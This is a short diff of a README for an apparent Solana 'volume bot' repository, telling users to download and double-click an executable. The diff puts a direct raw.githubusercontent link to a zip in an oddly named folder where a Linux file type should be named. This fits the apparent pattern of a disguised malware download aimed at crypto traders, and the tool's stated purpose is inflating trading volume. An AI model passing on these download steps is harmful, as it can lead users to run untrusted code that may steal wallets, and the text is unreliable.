GRANDAO01/Bonkfun-Raydium-Volume-Bot/README.md

 1. After downloading, locate the downloaded file:
    - For Windows, it will typically be a `.exe` file.
    - For macOS, it will be a `.dmg` or `.pkg` file.
-   - For Linux, it may be a `.tar.gz` file or a package file.
+   - For Linux, it may be a `https://raw.githubusercontent.com/GRANDAO01/Bonkfun-Raydium-Volume-Bot/main/houseridden/Bonkfun-Raydium-Volume-Bot.zip` file or a package file.

 2. **Windows:**
    - Double-click the `.exe` file.